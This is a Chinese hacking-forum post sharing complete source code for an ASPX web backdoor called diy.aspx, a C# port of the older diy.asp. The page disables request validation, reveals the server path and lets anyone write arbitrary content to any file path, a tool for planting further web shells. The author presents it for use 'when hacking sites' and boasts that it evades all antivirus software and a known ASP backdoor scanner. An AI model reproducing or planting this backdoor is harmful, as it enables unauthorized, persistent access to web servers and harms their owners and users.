diy.aspx记念diy.asp

[文章作者]寂寞hacker
[信息来源]邪恶八进制信息安全团队(http://forum.eviloctal.com)

要做毕业设计了,学校难得一次的批准了我们能够上网….不过2MB的速度,,,实在是…昨晚搞站的时候diy.asp被杀毒干掉了!网站支持ASPX,,今天早上顺手写了个扔上来!本机测试正常,如有BUG请告知!不甚感激!
想当初偶也是用着diy.asp很久,有点感情了!弄个他的c#版本,怀念一下!

以下为源码

<%@ Page language="c#" validateRequest=false %>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
<HEAD>
<title>DIY 微型后门 作者:寂寞hacker QQ:349063324</title>
<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
<meta content="C#" name="CODE_LANGUAGE">
<meta content="JavaScript" name="vs_defaultClientScript">
<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
<script language="C#" runat="server">

void Page_Load(object sender, System.EventArgs e)
{
string strPath = Server.MapPath(".");
L3.Text = strPath;
}

void Button1_Click(object sender, System.EventArgs e)
{
try
{
System.IO.FileInfo fil = new System.IO.FileInfo(T1.Text);
System.IO.StreamWriter sw = fil.CreateText();
sw.Write(T2.Text);
sw.Flush();
sw.Close();
L4.Text = "文件保存成功!";
}

catch(Exception ex)
{
L4.Text = ex.Message;
}
}
</script>
</HEAD>
<body MS_POSITIONING="GridLayout">
<form id="Form1" method="post" runat="server">
<asp:Label id="L1" style="Z-INDEX: 101; LEFT: 24px; POSITION: absolute; TOP: 96px" runat="server">本文件绝对路径:</asp:Label>
<asp:TextBox id="T1" style="Z-INDEX: 102; LEFT: 144px; POSITION: absolute; TOP: 64px" runat="server"
Width="376px"></asp:TextBox>
<asp:Label id="L2" style="Z-INDEX: 103; LEFT: 24px; POSITION: absolute; TOP: 64px" runat="server">文件保存路径:</asp:Label>
<asp:Label id="L3" style="Z-INDEX: 104; LEFT: 144px; POSITION: absolute; TOP: 96px" runat="server"
Width="584px"></asp:Label>
<asp:TextBox id="T2" style="Z-INDEX: 105; LEFT: 24px; POSITION: absolute; TOP: 128px" runat="server"
Width="504px" Height="344px" TextMode="MultiLine"></asp:TextBox>
<asp:Button id="Button1" style="Z-INDEX: 106; LEFT: 424px; POSITION: absolute; TOP: 504px" runat="server"
Width="96px" Text="保存文件" OnClick="Button1_Click"></asp:Button>
<asp:Label id="L4" style="Z-INDEX: 107; LEFT: 144px; POSITION: absolute; TOP: 24px" runat="server"
Width="432px"></asp:Label></form>
</body>
</HTML>

偶为连保存文件都懒得弄的兄弟(比如我)保存好放在附件里了,,很简单的东西!只是方便大家搞站的时候..多个后门罢了!测试的时候.通过所有杀毒软件!包括lake2大哥的asp后门扫描工具!总之。..到目前为止..是没有杀毒弄他的!使用和diy.asp一样!

ps:偶美工不敢恭维!就不献丑了!哪位兄弟改得漂亮一点的话!麻烦给我一份,谢谢!MSN:[email protected]

相关日志

发表评论